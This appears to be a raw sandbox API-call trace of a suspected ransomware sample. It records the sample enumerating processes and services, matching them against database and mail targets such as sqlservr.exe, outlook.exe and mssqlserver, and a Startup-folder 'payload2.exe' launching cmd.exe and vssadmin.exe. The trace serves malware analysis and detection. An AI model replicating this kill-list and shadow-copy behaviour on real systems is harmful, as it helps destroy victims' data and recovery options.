Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0049.412] lstrlenW (lpString="csrss.exe") returned 9 [0049.412] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0049.412] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0049.412] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0049.412] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0049.412] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0049.412] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0049.412] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0049.412] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0049.488] lstrlenW (lpString="wininit.exe") returned 11 [0049.488] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0049.488] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0049.488] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0049.488] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0049.489] lstrlenW (lpString="csrss.exe") returned 9 [0049.489] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0049.489] lstrlenW (lpString="winlogon.exe") returned 12 [0049.490] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0049.490] lstrlenW (lpString="services.exe") returned 12 [0049.490] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0049.491] lstrlenW (lpString="lsass.exe") returned 9 [0049.491] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0049.491] lstrlenW (lpString="lsm.exe") returned 7 [0049.492] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.492] lstrlenW (lpString="svchost.exe") returned 11 [0049.492] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.493] lstrlenW (lpString="svchost.exe") returned 11 [0049.493] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.493] lstrlenW (lpString="svchost.exe") returned 11 [0049.493] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.494] lstrlenW (lpString="svchost.exe") returned 11 [0049.494] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.495] lstrlenW (lpString="svchost.exe") returned 11 [0049.495] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0049.497] lstrlenW (lpString="audiodg.exe") returned 11 [0049.497] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.498] lstrlenW (lpString="svchost.exe") returned 11 [0049.498] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.499] lstrlenW (lpString="svchost.exe") returned 11 [0049.499] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0049.499] lstrlenW (lpString="dwm.exe") returned 7 [0049.499] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0049.500] lstrlenW (lpString="explorer.exe") returned 12 [0049.500] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0049.500] lstrlenW (lpString="spoolsv.exe") returned 11 [0049.500] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0049.501] lstrlenW (lpString="taskhost.exe") returned 12 [0049.501] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.502] lstrlenW (lpString="svchost.exe") returned 11 [0049.502] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0049.502] lstrlenW (lpString="taskeng.exe") returned 11 [0049.502] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0049.503] lstrlenW (lpString="taskhost.exe") returned 12 [0049.503] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="challenging.exe")) returned 1 [0049.503] lstrlenW (lpString="challenging.exe") returned 15 [0049.504] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pgp prix.exe")) returned 1 [0049.504] lstrlenW (lpString="pgp prix.exe") returned 12 [0049.504] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="user-reno.exe")) returned 1 [0049.505] lstrlenW (lpString="user-reno.exe") returned 13 [0049.505] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="aggregate.exe")) returned 1 [0049.505] lstrlenW (lpString="aggregate.exe") returned 13 [0049.505] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dressed.exe")) returned 1 [0049.506] lstrlenW (lpString="dressed.exe") returned 11 [0049.506] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="accounts evaluated jr.exe")) returned 1 [0049.506] lstrlenW (lpString="accounts evaluated jr.exe") returned 25 [0049.506] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability_joined_liechtenstein.exe")) returned 1 [0049.507] lstrlenW (lpString="vulnerability_joined_liechtenstein.exe") returned 38 [0049.507] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="developing.exe")) returned 1 [0049.508] lstrlenW (lpString="developing.exe") returned 14 [0049.508] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="supported.exe")) returned 1 [0049.539] lstrlenW (lpString="supported.exe") returned 13 [0049.539] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="girlstionselect.exe")) returned 1 [0049.540] lstrlenW (lpString="girlstionselect.exe") returned 19 [0049.540] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="employedboysdesktop.exe")) returned 1 [0049.541] lstrlenW (lpString="employedboysdesktop.exe") returned 23 [0049.541] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="clay_enquiry_thee.exe")) returned 1 [0049.541] lstrlenW (lpString="clay_enquiry_thee.exe") returned 21 [0049.541] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eating.exe")) returned 1 [0049.542] lstrlenW (lpString="eating.exe") returned 10 [0049.542] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nh_protected.exe")) returned 1 [0049.542] lstrlenW (lpString="nh_protected.exe") returned 16 [0049.543] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability.exe")) returned 1 [0049.543] lstrlenW (lpString="vulnerability.exe") returned 17 [0049.543] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="incidentoceaneast.exe")) returned 1 [0049.544] lstrlenW (lpString="incidentoceaneast.exe") returned 21 [0049.544] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ment_lo_animation.exe")) returned 1 [0049.544] lstrlenW (lpString="ment_lo_animation.exe") returned 21 [0049.544] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="counters_config_prostate.exe")) returned 1 [0049.545] lstrlenW (lpString="counters_config_prostate.exe") returned 28 [0049.545] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="teethpichuntercrude.exe")) returned 1 [0049.546] lstrlenW (lpString="teethpichuntercrude.exe") returned 23 [0049.546] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0049.546] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0049.546] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe")) returned 1 [0049.547] lstrlenW (lpString="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 65 [0049.547] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0049.548] lstrlenW (lpString="cmd.exe") returned 7 [0049.548] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0049.548] lstrlenW (lpString="conhost.exe") returned 11 [0049.548] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x9b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0049.549] lstrlenW (lpString="vssadmin.exe") returned 12 [0049.549] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0049.550] lstrlenW (lpString="VSSVC.exe") returned 9 [0049.550] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.550] lstrlenW (lpString="svchost.exe") returned 11 [0049.550] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0049.551] CloseHandle (hObject=0x190) returned 1 [0049.551] Sleep (dwMilliseconds=0x1f4) [0050.163] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x67fec8 [0050.163] EnumServicesStatusExW (in: hSCManager=0x67fec8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 0 [0050.164] GetLastError () returned 0xea [0050.164] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x12c6) returned 0x3940ef0 [0050.164] EnumServicesStatusExW (in: hSCManager=0x67fec8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3940ef0, cbBufSize=0x12c6, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3940ef0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 1 [0050.164] CloseServiceHandle (hSCObject=0x67fec8) returned 1 [0050.165] lstrlenW (lpString="Appinfo") returned 7 [0050.165] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0050.165] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0050.165] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0050.165] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0050.165] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0050.165] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0050.165] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0050.165] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0050.165] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0050.165] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0050.165] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0050.165] lstrlenW (lpString="AudioSrv") returned 8 [0050.165] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0050.165] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0050.165] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0050.165] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0050.165] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0050.165] lstrlenW (lpString="BFE") returned 3 [0050.165] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0050.165] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0050.165] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0050.165] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0050.165] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0050.165] lstrlenW (lpString="CryptSvc") returned 8 [0050.165] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0050.165] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0050.165] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0050.165] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0050.165] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0050.165] lstrlenW (lpString="CscService") returned 10 [0050.166] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0050.166] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0050.166] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0050.166] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0050.166] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0050.166] lstrlenW (lpString="DcomLaunch") returned 10 [0050.166] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0050.166] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0050.166] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0050.166] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0050.166] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0050.166] lstrlenW (lpString="Dhcp") returned 4 [0050.166] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0050.166] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0050.166] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0050.166] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0050.166] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0050.166] lstrlenW (lpString="Dnscache") returned 8 [0050.166] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0050.166] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0050.166] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0050.166] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0050.166] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0050.166] lstrlenW (lpString="DPS") returned 3 [0050.166] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0050.166] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0050.166] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0050.166] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0050.166] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0050.166] lstrlenW (lpString="eventlog") returned 8 [0050.166] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0050.166] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0050.166] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0050.166] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0050.166] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0050.166] lstrlenW (lpString="EventSystem") returned 11 [0050.166] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0050.166] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0050.166] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0050.167] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0050.167] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0050.167] lstrlenW (lpString="gpsvc") returned 5 [0050.167] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0050.167] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0050.167] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0050.167] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0050.167] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0050.167] lstrlenW (lpString="iphlpsvc") returned 8 [0050.167] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0050.167] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0050.167] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 